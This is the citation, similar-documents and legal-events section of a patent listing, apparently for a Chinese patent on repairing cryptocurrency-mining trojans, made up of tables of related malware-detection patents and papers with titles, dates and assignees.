| CN107395395A (en) * | 2017-06-19 | 2017-11-24 | 国家电网公司 | The treating method and apparatus of security protection system |
| CN108900496A (en) * | 2018-06-22 | 2018-11-27 | 杭州安恒信息技术股份有限公司 | A kind of quick detection website is implanted the detection method and device of digging mine wooden horse |
Cited By (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN112052053A (en) * | 2020-10-10 | 2020-12-08 | 国科晋云技术有限公司 | Method and system for cleaning mining program in high-performance computing cluster |
| CN112052053B (en) * | 2020-10-10 | 2023-12-19 | 国科晋云技术有限公司 | Method and system for cleaning ore mining program in high-performance computing cluster |
| CN114697086A (en) * | 2022-03-17 | 2022-07-01 | 浪潮云信息技术股份公司 | Mining Trojan detection method based on depth canonical correlation analysis |
| CN114697086B (en) * | 2022-03-17 | 2024-06-18 | 浪潮云信息技术股份公司 | Mining Trojan detection method based on depth typical correlation analysis |
Also Published As
| Publication number | Publication date |
|---|---|
| CN110879887B (en) | 2022-03-04 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US10291634B2 (en) | System and method for determining summary events of an attack | |
| CN105991595B (en) | Network security protection method and device | |
| Weckstén et al. | A novel method for recovery from Crypto Ransomware infections | |
| US10972488B2 (en) | Method and system for modeling all operations and executions of an attack and malicious process entry | |
| US7480683B2 (en) | System and method for heuristic analysis to identify pestware | |
| US7523502B1 (en) | Distributed anti-malware | |
| CN110879887B (en) | Method, device, equipment and medium for repairing mining trojan program | |
| US20060041942A1 (en) | System, method and computer program product for preventing spyware/malware from installing a registry | |
| US20050172337A1 (en) | System and method for unpacking packed executables for malware evaluation | |
| JP2008537267A (en) | System and method for detecting and deterring attacks using honeypots | |
| JP2006127497A (en) | Efficient white listing of user-modifiable file | |
| Zimba et al. | Demystifying ransomware attacks: reverse engineering and dynamic malware analysis of wannacry for network and information security | |
| US10728266B2 (en) | Methods and systems for identifying malware enabled by automatically generated domain names | |
| US7000250B1 (en) | Virtual opened share mode system with virus protection | |
| Machie et al. | Nimda worm analysis | |
| Shu et al. | Ensuring deception consistency for ftp services hardened against advanced persistent threats | |
| US11068594B2 (en) | Threat detection system | |
| Thakur et al. | Ransomware: Threats, identification and prevention | |
| KR20110131627A (en) | Apparatus for detecting malicious code using structure and characteristic of file, and terminal thereof | |
| CN102799812B (en) | Method and device for processing application program | |
| Kaur et al. | An empirical analysis of crypto-ransomware behavior | |
| CN109145599B (en) | Protection method for malicious viruses | |
| GB2432687A (en) | Preventing spyware/malware from installing in a registry | |
| Hu et al. | Detecting unknown massive mailing viruses using proactive methods | |
| JP2007058862A (en) | Method and apparatus for managing server process, and computer program (method or apparatus for managing server process in computer system) |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |